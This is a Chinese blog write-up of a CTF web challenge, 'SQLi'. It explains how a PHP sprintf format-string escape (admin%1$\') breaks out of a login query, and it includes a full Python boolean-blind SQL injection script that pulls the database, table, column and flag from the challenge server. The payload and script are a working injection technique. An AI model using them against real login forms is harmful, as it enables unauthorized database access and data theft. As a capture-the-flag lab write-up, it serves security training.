CTF-“迎圣诞,拿大奖”活动赛题SQLi

最新推荐文章于 2024-05-09 19:30:36 发布
最新推荐文章于 2024-05-09 19:30:36 发布
阅读量303 收藏
点赞数
文章标签: post url cuda web 甘特图
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MidSummer411/article/details/111957344
版权

分值:200分 类型:Web题目名称:SQLi
题目内容:find the flag.

解题步骤

  1. 进入链接,发现是个登录页面,没有注册的地方,填入admin&admin,提示password error!
  2. 分析报文,无异常
  3. intruder一遍,发现username是admin%时报错
    image.png
  4. 显然是sprintf的格式化问题导致单引号逃逸
  5. 尝试各种字符串后,postdata为 username=admin%1$\\' or 1=1 # &password=admin显示password error! . username=admin%1$\\' or 1=2 # &password=admin显示username error! ,显然注入点就是这里了.
  6. 用脚本跑出flag

代码:

#coding:utf-8

import requests
import string

def boom():
    url = r'http://af6add5b19fe4fddad8a5d5e413129df464f7ee5ce6d4a89.game.ichunqiu.com/index.php'
    s = requests.session()
    dic = string.digits + string.letters + "!@#$%^&*()_+{}-="
    right = 'password error!'
    error = 'username error!'

    lens = 0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#"
        data={'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            lens=i
            break
        i+=1
        pass
    print("[+]length(database()): %d" %(lens))

    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if right in r:
                strs = strs + c
                print strs
                break
        pass
    pass
    print("[+]database():%s" %(strs))

    lens=0
    i = 1
    while True:
        payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"
        data = {'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            lens = i
            break
        i+=1
        pass
    print("[+]length(table): %d" %(lens))

    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if right in r:
                strs = strs + c
                print strs
                break
        pass
    pass
    print("[+]table_name:%s" %(strs))
    tablename = '0x' + strs.encode('hex')
    table_name = strs

    lens=0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#"
        data = {'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            lens = i
            break
        i+=1
        pass
    print("[+]length(column): %d" %(lens))

    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if right in r:
                strs = strs + c
                print strs
                break
        pass
    pass
    print("[+]column_name:%s" %(strs))
    column_name = strs

    num=0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
        data = {'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            num = i
            break
        i+=1
        pass
    print("[+]number(column): %d" %(num))

    lens=0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"
        data = {'username':payload,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            lens = i
            break
        i+=1
        pass
    print("[+]length(value): %d" %(lens))

    i=1    
    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
            data = {'username':payload,'password':'1'}
            r = s.post(url,data=data).content
            if right in r:
                strs = strs + c
                print strs
                break
        pass
    pass
    print("[+]flag:%s" %(strs))

if __name__ == '__main__':
    boom()
    print 'Finish!'

知识点

Flutter&Python&Test
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
圣诞拿大奖活动赛题 Web-SQLi
qq_34106499的博客
01-17 546
1. php中sprintf()函数漏洞原理及其利用; 2. mysql盲注语法及python脚本; 3. sqlmap的需要进一步学习;
"圣诞拿大奖"赛题——SQLI
Ramona的博客
12-22 657
0x01 本题所需知识清单: 1.php sprintf()函数漏洞:https://blog.csdn.net/WQ_BCJ/article/details/85057447 2.布尔盲注基本playload及流程:https://blog.csdn.net/WQ_BCJ/article/details/84592445 3.Burpsuit  Intruder暴力猜解:https://...
CTF-Web Exploitation(持续更新)
最新发布
huckers的博客
05-09 1004
根据提示使用不同的请求方式得到response可能会得到结果使用抓包工具Burp Suit抓取链接请求信息修改请求方式POST/GET为HEAD发送请求,获取包含flag的响应信息TheHEADGETHEAD方法请求与GET请求相同的响应,但没有响应正文。Burp Suite是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。本题中使用。
圣诞拿大奖活动赛题 SQLi
feng的博客
10-02 294
这题的新姿势就是利用sprintf格式化字符串漏洞来实现SQL注入。
圣诞拿大奖活动赛题_SQLi(sprintf格式化字符)
a173262565的博客
04-08 152
题目应该就是注入没跑了 先拿正常输入试试,输了admin,admin,结果返回password error!,说明还真的存在admin账户 拿常规注入语句试探一下admin' and 1=1%23,发生了报错 红框这里就给了我们提示,记得之前遇上过一个sprintf格式化字符串所引起的漏洞 具体原理可以参考下面这篇文章 sprintf格式化字符串带来的注入隐患 先...
圣诞拿大奖活动赛题------------SQLi
大方子
08-29 1404
========================================= 个人收获 1.sprintf 格式漏洞   =========================================   题目     上来先扫下目录看下源码和http请求发现没有什么奇怪的地方,也就八九不离十是sql注入了   开始想尝试 万能密码 后来发现有过滤 尝试用...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
soreatu#My-CTF-Challenge#ctf赛题设计说明2
07-25
[题目考点]:1. AES加密模式2. 登录协议[是否原创]:原创[题目环境]:[特别注意]:[题目制作过程]:cd ./源码docker build . -t
SQLi-CTF-master.zip
04-09
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决各种安全挑战来获取积分,而SQLi-CTF通常是指在CTF比赛中涉及SQL注入的特定类型挑战。 在SQL注入攻击中,攻击者可以向应用程序输入恶意的SQL代码,以...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
SQLi 圣诞拿大奖活动赛题 复现
weixin_34015336的博客
05-11 152
题目叫注入,先burp fuzz试一下 出来了一堆长度不一样的,还出了一个这个函数,这个函数大概问题就是 逃逸问题 比如输入%1$/' 他后端会把这个% 会吧1%/全部给吃掉,就导致单引号逃逸出来了 然后自己布尔盲注就上脚本跑就OK了 转载于:https://www.cnblogs.com/haozhizhi/p/10847167.html...
圣诞拿大奖赛题——SQLI(附sprintf格式化字符串安全问题超详解)
g1ut_t0ny的博客
07-03 287
"圣诞拿大奖"赛题——SQLI 0x00题目 结合题目给出的“SQLI”与页面,正常思路是SQL注入,尝试用admin账户登陆,提示password error,证明有admin用户存在,那么就对username进行注入,尝试弱口令 0x01发现注入点 开始在username处进行常规注入,考虑万能密码,所以直接使用burpsuit的intruder跑一下,查看那些字母或者字符没有被过滤掉(waf字典),但发现带有%的response中返回长度不一样,查看回显发现提示 构造username=admin
圣诞拿大奖活动赛题可恶的黑客
lovelj的博客
01-06 1970
话不多说,直接上图 1.每拿到这种题目,我首先直接导出http 2.在文件最后看见一个TXT 3.打开看见这个 4.既然看见了就看看呗,搜索他 5.发现有三个,一个一个打开看呗(发正也是蒙)发现第二个里面有一段Unicode编码 6.那就把它转转看看呗 7.不错,出来了,那就提交呗 什么,居然不对,再看看,没错,复制的对了 那就再看看, 发现flag变f1ag了 在提交,ok ...
[复现]ichunqiu“圣诞拿大奖活动赛题-web-SQLi
baola的博客
11-14 235
sprintf字符串逃逸漏洞实现sql注入
[圣诞拿大奖] Sqli writeup
Flyour的博客
03-31 1053
Sqli 的writeup 拿到题目看到的就是一个登录框,可以根据经验进行尝试一下用户名=amdin,密码=admin,得到的结果是password error。然后随便换一个其他的名字进行登录,发现得到的结果是username error。从这里可以看到响应结果会反映出是用户名出错,还是密码出错。 然后尝试进行注入,试了万能密码等注入,结果一直是username error。一开始我以为是w...
ctf-writeup-圣诞拿大奖-SQLi
key_nothing的博客
08-06 345
打开连接,出现一个登录框: 尝试:扫目录、弱口令、源代码都没有什么发现 题目sqli 猜测sql注入应该在登录处,转包丢sqlmap先跑一发,也没有结果。 尝试手工测一下,发现在用户名处输入%时居然有报错! 看报错提示,有sprintf()错误,瞬间想起了这个函数有格式化字符串漏洞,抓包尝试一番。 sprintf注入,或者说php格式化字符串注入的原理为: 要明白%后的一个字符(除了%,%...
CTF——MISC习题讲解(流量分析winshark系列)
tlovejr的博客
03-14 6846
CTF——MISC习题讲解(流量分析winshark系列) 前言 上一章节我们已经做完一场比赛的杂项题目,这次给大家介绍一下不一样的,给大家来一期流量分析专题,在这个专题中,所有的题目链接都整理好了,就不给大家一一展示了,大家可以直接统一下载即可。 一、基础篇-----flag明文 首先打开文件发现以下界面 在这个界面直接ctrl+f,直接搜索flag关键字 然后直接查找就可以看到flag 二、基础篇----flag编码 1、bianma1 这个题直接查找flag的话是没有的,所以我们把flag直接编
“百度杯”CTF比赛 十月场 writeup
Senimo
08-17 3365
“百度杯”CTF比赛 十月场 writeupMisc签到题那些年我追过的贝丝我要变成一只程序员剧情大反转challenge传说中的签到题听说是rc4算法try again表姐家的签到题泄露的数据考眼力flag格式WebLoginBackdoorGetFlagNot FoundVldEXEC登录GiftfuzzingTryHashNothing Misc 签到题 **分值:10分 题目内容: 对百度...
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值